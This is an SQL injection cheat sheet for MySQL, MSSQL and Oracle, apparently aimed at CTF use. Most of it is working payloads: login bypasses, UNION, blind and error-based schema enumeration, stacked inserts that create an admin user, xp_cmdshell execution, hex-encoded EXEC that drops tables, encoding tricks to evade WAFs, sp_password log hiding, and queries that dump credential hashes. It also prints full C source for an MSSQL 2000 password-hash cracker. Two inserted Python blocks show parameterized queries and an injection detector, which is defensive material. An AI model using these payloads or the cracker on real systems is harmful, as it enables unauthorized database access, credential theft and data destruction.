A login form may be open to a "universal password" bypass or to blind injection; this is common in CTF challenges.
Query: SELECT * FROM Table WHERE username = '';
Common bypasses:
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
'='
'LIKE'
'=0--+
Example: SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';
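As an added illustration, not part of the original notes: the login query above built by string concatenation, beside the parameterized form that defeats every payload in the list. SQLite (Python's sqlite3) stands in for the real DBMS and the Users table is constructed here.

```python
import sqlite3

# Constructed in-memory demo schema (not from any real application).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    con.execute("INSERT INTO Users VALUES ('Mike', 's3cret')")
    con.commit()
    return con

def login_concat(con, username, password):
    """Vulnerable form: the WHERE clause is built by string concatenation,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT * FROM Users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return con.execute(sql).fetchone() is not None

def login_param(con, username, password):
    """Fixed form: placeholders keep the input as data; a quote or a
    comment sequence in the value never reaches the parser as syntax."""
    sql = "SELECT * FROM Users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    for pw in ("s3cret", "' OR '' = '", "' OR 1 -- -"):
        print(repr(pw), "concat:", login_concat(db, "Mike", pw),
              "param:", login_param(db, "Mike", pw))
```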
0x01 MySQL
Commenting out the query
The following can be used to comment out the rest of the query after the injection point:
#      hash comment
/*     C-style comment
-- -   SQL comment
;%00   null byte
`      backtick
Examples:
SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';
Note:
The backtick can only be used to end the query when it is parsed as an alias.
Testing the version
Variables:
VERSION()
@@VERSION
@@GLOBAL.VERSION
Example:
SELECT * FROM Users WHERE id = '1' AND MID(VERSION(),1,1) = '5';
Note:
If the DBMS runs on a Windows host, the output contains -nt-log.
Guessing the number of columns
GROUP/ORDER BY n+1;
Notes:
Keep increasing the number until you get a False response.
Although GROUP BY and ORDER BY have different functions in SQL, both can be used in exactly the same way to determine the number of columns in the query.
Example:
Query: SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';
1' ORDER BY 1--+            True
1' ORDER BY 2--+            True
1' ORDER BY 3--+            True
1' ORDER BY 4--+            False - the query uses only 3 columns
-1' UNION SELECT 1,2,3--+   True
Error-based (1)
GROUP/ORDER BY 1,2,3,4,5...
Note:
Similar to the previous method, but if error reporting is enabled the column count can be determined with a single request.
Examples:
Query: SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}'
1' GROUP BY 1,2,3,4,5--+   Unknown column '4' in 'group statement'
1' ORDER BY 1,2,3,4,5--+   Unknown column '4' in 'order clause'
Error-based (2)
SELECT ... INTO var_list, var_list1, var_list2...
Notes:
This method works if error reporting is enabled.
It is useful for finding the column count when the injection point comes after a LIMIT clause.
Example:
Query: SELECT permission FROM Users WHERE id = {INJECTION POINT};
-1 UNION SELECT 1 INTO @,@,@   The used SELECT statements have a different number of columns
-1 UNION SELECT 1 INTO @,@     The used SELECT statements have a different number of columns
-1 UNION SELECT 1 INTO @       No error, so the query uses 1 column
Example 2:
Query: SELECT username, permission FROM Users limit 1,{INJECTION POINT};
1 INTO @,@,@   The used SELECT statements have a different number of columns
1 INTO @,@     No error, so the query uses 2 columns (username, permission)
Error-based (3)
AND (SELECT * FROM SOME_EXISTING_TABLE) = 1
Notes:
This works if you know the name of a table you can read and error reporting is enabled.
It returns the number of columns in that table, not in the query.
Example:
Query: SELECT permission FROM Users WHERE id = {INJECTION POINT};
1 AND (SELECT * FROM Users) = 1   Operand should contain 3 column(s)
Retrieving table names
Union
UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;
Blind
AND (SELECT SUBSTR(table_name,1,1) FROM information_schema.tables LIMIT 1) > 'A'
Error
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);
AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));-- Available in MySQL 5.1.5
Tips:
version=10 for MySQL 5
Retrieving column names
Union
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
Blind
AND (SELECT SUBSTR(column_name,1,1) FROM information_schema.columns LIMIT 1) > 'A'
Error
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0);
AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5
AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1
AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a)
AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING (SOME_EXISTING_COLUMN)) a)
PROCEDURE ANALYSE
PROCEDURE ANALYSE()
The web application must display one of the selected columns of the query being injected into.
Example:
Query: SELECT username, permission FROM Users WHERE id = 1;
1 PROCEDURE ANALYSE()             gets the first column name
1 LIMIT 1,1 PROCEDURE ANALYSE()   gets the second column name
1 LIMIT 2,1 PROCEDURE ANALYSE()   gets the third column name
Note:
PROCEDURE ANALYSE() was deprecated in MySQL 5.7 and removed in MySQL 8.0, so this only works on older servers.
Retrieving multiple tables/columns at once
SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x
Example:
SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns
Table and column names
Finding a table name from a column name
SELECT table_name FROM information_schema.columns WHERE column_name = 'username';
SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%';
Finding column names from a table name
SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';
SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%';
Finding the currently running queries
SELECT info FROM information_schema.processlist
Tips:
Available since MySQL 5.1.7.
Quote bypass
SELECT * FROM Users WHERE username = 0x61646D696E                    ---> Hex encoding
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)    ---> CHAR() function
Stacked queries
Only possible when the client library allows several statements in one call.
Examples:
SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTO Users(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin'); SELECT * FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROM Users;
0x02 MSSQL
Commenting out the query
The following can be used to comment out the rest of the query after the injection point:
/*     C-style comment
--     SQL comment
;%00   null byte
Examples:
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';
Testing the version
@@VERSION
Example:
True if the MSSQL version is 2008:
SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE '%2008%';
Tips:
The output also contains the version of the Windows operating system.
Database credentials
Database.Table:        master..syslogins, master..sysprocesses
Columns:               name, loginame
Current user:          user, system_user, suser_sname(), is_srvrolemember('sysadmin')
Database credentials:  SELECT user, password FROM master.dbo.sysxlogins
Example:
Return the current user:
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
Check whether the current user is a sysadmin:
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);
Database names
Database.Table:  master..sysdatabases
Column:          name
Current DB:      DB_NAME(i)
Examples:
SELECT DB_NAME(5);
SELECT name FROM master..sysdatabases;
Guessing the number of columns
ORDER BY n+1;
Example:
Query: SELECT username, password, permission FROM Users WHERE id = '1';
1' ORDER BY 1--            True
1' ORDER BY 2--            True
1' ORDER BY 3--            True
1' ORDER BY 4--            False - so there are only three columns
-1' UNION SELECT 1,2,3--   True
Tips:
Keep increasing the number until the request returns an error.
The following can be used to get the columns of the current query.
GROUP BY / HAVING
Example:
Query: SELECT username, password, permission FROM Users WHERE id = '1';
1' HAVING 1=1--                                           Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1' GROUP BY username HAVING 1=1--                         Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1' GROUP BY username, password HAVING 1=1--               Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1' GROUP BY username, password, permission HAVING 1=1--   No Error
Tips:
Once all columns are included, no error is returned.
Guessing table names
Tables can be retrieved from two different sources: information_schema.tables or master..sysobjects.
Union
UNION SELECT name FROM master..sysobjects WHERE xtype='U'
Blind
AND (SELECT TOP 1 SUBSTRING(table_name,1,1) FROM information_schema.tables) > 'A'
Error
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))
xtype='U' selects user-defined tables; use 'V' for views.
Guessing column names
Columns can be retrieved from two different sources: information_schema.columns or master..syscolumns.
Union
UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..sysobjects WHERE name = 'tablename')
Blind
AND (SELECT TOP 1 SUBSTRING(column_name,1,1) FROM information_schema.columns) > 'A'
Error
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns)
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))
Create a temporary table or column and insert the data:
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
Dump the contents:
AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);
Drop the table:
AND 1=0; DROP TABLE TMP_DB;
A simpler method is available from MSSQL 2005 onward: FOR XML PATH('') acts as a concatenator and lets all table names be retrieved with a single query:
SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH('')
You can also encode your query:
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--
Quote bypass
SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)
String concatenation
SELECT CONCAT('a','a','a');   (SQL Server 2012 and later)
SELECT 'a'+'d'+'mi'+'n';
Conditional statements
IF
CASE
Examples:
IF 1=1 SELECT 'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END;
Time delays
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';
Example:
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
OPENROWSET attack
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
Dump the contents:
' UNION SELECT tbl FROM TMP_DB--
Drop the table:
' DROP TABLE TMP_DB--
sp_password (hiding the query)
Appending sp_password to the end of the query hides it from the T-SQL trace log; this is intended as a security measure. The trace still records the event with its text replaced by the comment below, so that replacement text appearing outside genuine password changes is itself a detection signal.
SP_PASSWORD
Example:
' AND 1=1--sp_password
Output:
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
Stacked queries
MSSQL supports stacked queries.
Example:
' AND 1=0 INSERT INTO ([column1], [column2]) VALUES ('value1', 'value2');
Fuzzing
The following characters can be used as whitespace:
01  Start of Heading
02  Start of Text
03  End of Text
04  End of Transmission
05  Enquiry
06  Acknowledge
07  Bell
08  Backspace
09  Horizontal Tab
0A  New Line
0B  Vertical Tab
0C  New Page
0D  Carriage Return
0E  Shift Out
0F  Shift In
10  Data Link Escape
11  Device Control 1
12  Device Control 2
13  Device Control 3
14  Device Control 4
15  Negative Acknowledge
16  Synchronous Idle
17  End of Transmission Block
18  Cancel
19  End of Medium
1A  Substitute
1B  Escape
1C  File Separator
1D  Group Separator
1E  Record Separator
1F  Unit Separator
20  Space
25  %
22  "
28  (
29  )
5B  [
5D  ]
Examples:
S%E%L%E%C%T%01column%02FROM%03table;
A%%ND 1=%%%%%%%%1;
UNION(SELECT(column)FROM(table));
SELECT"table_name"FROM[information_schema].[tables];
Tips:
The percent sign between keywords only works on ASP(x) web applications.
Characters allowed after AND/OR
01 - 20  Range
21  !
2B  +
2D  -
2E  .
5C  \
7E  ~
Example:
SELECT 1FROM[table]WHERE\1=\1AND\1=\1;
Tips:
The backslash does not seem to work on MSSQL 2000.
Encoding
Encoding can sometimes bypass a WAF/IDS.
URL Encoding                          SELECT %74able_%6eame FROM information_schema.tables;
Double URL Encoding                   SELECT %2574able_%256eame FROM information_schema.tables;
Unicode Encoding                      SELECT %u0074able_%u006eame FROM information_schema.tables;
Invalid Hex Encoding (ASP)            SELECT %tab%le_%na%me FROM information_schema.tables;
Hex Encoding                          ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--
HTML Entities (needs to be verified)  %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B
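An added example, not part of the original notes, written for the detection side of the whitespace, encoding and sp_password tricks above: it canonicalizes a request parameter (repeated URL decoding, %uXXXX escapes, the classic-ASP stray-'%' behaviour, control characters treated as whitespace) before matching signatures, because matching the raw bytes is exactly what these encodings defeat. Signature names and sample values are this example's own.

```python
import re
from urllib.parse import unquote

# Bytes 0x01-0x20 are accepted as whitespace by MSSQL (the fuzz list above),
# so a filter that only splits on 0x20 sees "SELECT\x01column" as one token.
_CTRL_WS = re.compile(r"[\x01-\x20]+")
_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")       # IIS-style %uXXXX escapes
_STRAY_PCT = re.compile(r"%(?![0-9a-fA-F]{2})")  # '%' not starting a valid escape

def normalize(raw, rounds=3):
    """Canonicalize one request parameter before signature matching.
    Decoding repeatedly undoes double URL encoding; stripping stray '%'
    mirrors classic ASP, where S%E%L%E%C%T is read as SELECT."""
    s = raw
    for _ in range(rounds):
        s = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), s)
        s = unquote(s)
    s = _STRAY_PCT.sub("", s)
    s = _CTRL_WS.sub(" ", s)
    return s.lower()

# Signatures for the techniques catalogued on this page; the names are this
# example's own. They run on normalized text only.
PATTERNS = {
    "comment_terminator": re.compile(r"--|/\*|;\x00"),
    "column_enum": re.compile(r"\b(order|group)\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\b\s*\(?\s*select\b"),
    "stacked_exec": re.compile(r";\s*(declare|exec|drop|insert)\b"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b"),
    "time_delay": re.compile(r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\("),
    "trace_hiding": re.compile(r"sp_password"),
    "schema_probe": re.compile(r"information_schema|sysobjects|syscolumns|all_tab"),
}

def classify(raw):
    """Return the names of every signature that matches the normalized input."""
    text = normalize(raw)
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

# Constructed sample parameter values (not captured traffic).
SAMPLES = [
    "1' ORDER BY 4--+",
    "S%E%L%E%C%T%01column%02FROM%03table;",
    "SELECT %2574able_%256eame FROM information_schema.tables;",
    "' AND 1=1--sp_password",
    "UNION(SELECT(column)FROM(table))",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", classify(s) or "clean")
```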
Password cracking
A Metasploit module for JTR can be found here.
MSSQL 2000 password cracker
This tool is designed to crack Microsoft SQL Server 2000 passwords.
/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// This will perform a dictionary attack against the
// upper-cased hash for a password. Once this
// has been discovered try all case variant to work
// out the case sensitive password.
//
// This code was written by David Litchfield to
// demonstrate how Microsoft SQL Server 2000
// passwords can be attacked. This can be
// optimized considerably by not using the CryptoAPI.
//
// (Compile with VC++ and link with advapi32.lib
// Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <wincrypt.h>

FILE *fd = NULL;
char *lerr = "\nLength Error!\n";
int wd = 0;

int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);

int main(int argc, char *argv[])
{
    int err = 0;
    if (argc != 3)
    {
        printf("\n\n*** SQLCrack *** \n\n");
        printf("C:\\>%s hash passwd-file\n\n", argv[0]);
        printf("David Litchfield (david@ngssoftware.com)\n");
        printf("24th June 2002\n");
        return 0;
    }
    err = OpenPasswordFile(argv[2]);
    if (err != 0)
    {
        return printf("\nThere was an error opening the password file %s\n", argv[2]);
    }
    err = CrackPassword(argv[1]);
    fclose(fd);
    printf("\n\n%d", wd);
    return 0;
}

int OpenPasswordFile(char *pwdfile)
{
    fd = fopen(pwdfile, "r");
    if (fd)
        return 0;
    else
        return 1;
}

int CrackPassword(char *hash)
{
    char phash[100] = "";
    char pheader[8] = "";
    char pkey[12] = "";
    char pnorm[44] = "";
    char pucase[44] = "";
    char pucfirst[8] = "";
    char wttf[44] = "";
    char uwttf[100] = "";
    char *wp = NULL;
    char *ptr = NULL;
    int cnt = 0;
    int count = 0;
    unsigned int key = 0;
    unsigned int t = 0;
    unsigned int address = 0;
    unsigned int hx = 0;       // scratch for sscanf("%x"); an unsigned char is too small for %x
    unsigned char cmp = 0;     // first byte of the upper-case hash, used as a quick filter
    unsigned char x = 0;
    HCRYPTPROV hProv = 0;
    HCRYPTHASH hHash;
    DWORD hl = 100;
    unsigned char szhash[100] = "";
    int len = 0;

    // Hash layout: "0x" + 4-char header + 8-char salt + 40-char SHA-1 of the
    // case-sensitive password + 40-char SHA-1 of the upper-cased password.
    if (strlen(hash) != 94)
    {
        return printf("\nThe password hash is too short!\n");
    }
    if (hash[0] == 0x30 && (hash[1] == 'x' || hash[1] == 'X'))
    {
        hash = hash + 2;
        strncpy(pheader, hash, 4);
        printf("\nHeader\t\t: %s", pheader);
        if (strlen(pheader) != 4)
            return printf("%s", lerr);
        hash = hash + 4;
        strncpy(pkey, hash, 8);
        printf("\nRand key\t: %s", pkey);
        if (strlen(pkey) != 8)
            return printf("%s", lerr);
        hash = hash + 8;
        strncpy(pnorm, hash, 40);
        printf("\nNormal\t\t: %s", pnorm);
        if (strlen(pnorm) != 40)
            return printf("%s", lerr);
        hash = hash + 40;
        strncpy(pucase, hash, 40);
        printf("\nUpper Case\t: %s", pucase);
        if (strlen(pucase) != 40)
            return printf("%s", lerr);
        strncpy(pucfirst, pucase, 2);
        sscanf(pucfirst, "%x", &hx);
        cmp = (unsigned char)hx;
    }
    else
    {
        return printf("The password hash has an invalid format!\n");
    }
    printf("\n\n Trying...\n");
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_FULL, 0))
    {
        if (GetLastError() == NTE_BAD_KEYSET)
        {
            // KeySet does not exist. So create a new keyset
            if (!CryptAcquireContext(&hProv,
                                     NULL,
                                     NULL,
                                     PROV_RSA_FULL,
                                     CRYPT_NEWKEYSET))
            {
                printf("FAILLLLLLL!!!");
                return FALSE;
            }
        }
    }
    while (1)
    {
        // get a word to try from the file (the wordlist is expected to be upper-cased already)
        ZeroMemory(wttf, 44);
        if (!fgets(wttf, 40, fd))
            return printf("\nEnd of password file. Didn't find the password.\n");
        wd++;
        len = strlen(wttf);
        wttf[len - 1] = 0x00;      // strip the trailing newline
        ZeroMemory(uwttf, 84);
        // Convert the word to UNICODE (UTF-16LE: each byte followed by 0x00)
        while (count < len)
        {
            uwttf[cnt] = wttf[count];
            cnt++;
            uwttf[cnt] = 0x00;
            count++;
            cnt++;
        }
        len--;
        wp = uwttf;
        sscanf(pkey, "%x", &key);
        cnt = cnt - 2;
        // Append the random stuff to the end of
        // the uppercase unicode password
        t = key >> 24;
        x = (unsigned char)t;
        uwttf[cnt] = x;
        cnt++;
        t = key << 8;
        t = t >> 24;
        x = (unsigned char)t;
        uwttf[cnt] = x;
        cnt++;
        t = key << 16;
        t = t >> 24;
        x = (unsigned char)t;
        uwttf[cnt] = x;
        cnt++;
        t = key << 24;
        t = t >> 24;
        x = (unsigned char)t;
        uwttf[cnt] = x;
        cnt++;
        // Create the hash
        if (!CryptCreateHash(hProv, CALG_SHA, 0, 0, &hHash))
        {
            printf("Error %x during CryptCreatHash!\n", GetLastError());
            return 0;
        }
        if (!CryptHashData(hHash, (BYTE *)uwttf, len * 2 + 4, 0))
        {
            printf("Error %x during CryptHashData!\n", GetLastError());
            return FALSE;
        }
        CryptGetHashParam(hHash, HP_HASHVAL, (BYTE *)szhash, &hl, 0);
        CryptDestroyHash(hHash);   // release the per-word hash object
        // Test the first byte only. Much quicker.
        if (szhash[0] == cmp)
        {
            // If first byte matches try the rest
            ptr = pucase;
            cnt = 1;
            while (cnt < 20)
            {
                ptr = ptr + 2;
                strncpy(pucfirst, ptr, 2);
                sscanf(pucfirst, "%x", &hx);
                // compare against a scratch value so cmp keeps holding the first byte
                if (szhash[cnt] == (unsigned char)hx)
                    cnt++;
                else
                {
                    break;
                }
            }
            if (cnt == 20)
            {
                // We've found the password
                printf("\nA MATCH!!! Password is %s\n", wttf);
                return 0;
            }
        }
        count = 0;
        cnt = 0;
    }
    return 0;
}
0x03 Oracle
Default databases
SYSTEM   all versions
SYSAUX   all versions
Commenting out the query
The following can be used to comment out the rest of the query after the injection point:
--   SQL comment
Example:
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
Testing the version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
Tips:
Every SELECT statement in Oracle must include a table (a FROM clause).
dual is a dummy table that can be used for testing.
Database credentials
SELECT username FROM all_users; -- all versions
SELECT name, password from sys.user$; -- privileged, <= 10g
SELECT name, spare4 from sys.user$; -- privileged, <= 11g
Database names
Current database
SELECT name FROM v$database;
SELECT instance_name FROM v$instance
SELECT global_name FROM global_name
SELECT SYS.DATABASE_NAME FROM DUAL
User databases
SELECT DISTINCT owner FROM all_tables;
Server hostname
SELECT host_name FROM v$instance; (privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;
Table and column names
Guessing table names
SELECT table_name FROM all_tables;
Guessing column names:
SELECT column_name FROM all_tab_columns;
Finding column names from a table name
SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';
Finding a table name from a column name
SELECT table_name FROM all_tab_columns WHERE column_name = 'password';
Retrieving multiple tables at once
SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;
Avoiding quotes
Unlike other RDBMSs, Oracle allows table/column names to be encoded.
SELECT 0x09120911091 FROM dual;               Hex encoding
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual;   CHR() function
String concatenation
SELECT 'a'||'d'||'mi'||'n' FROM dual;
Conditional statements
SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual
Time delays
Time delay
SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;
Heavy time delays
AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));
Privilege escalation
SELECT privilege FROM session_privs;
SELECT grantee, granted_role FROM dba_role_privs; (privileged)
DNS requests
SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;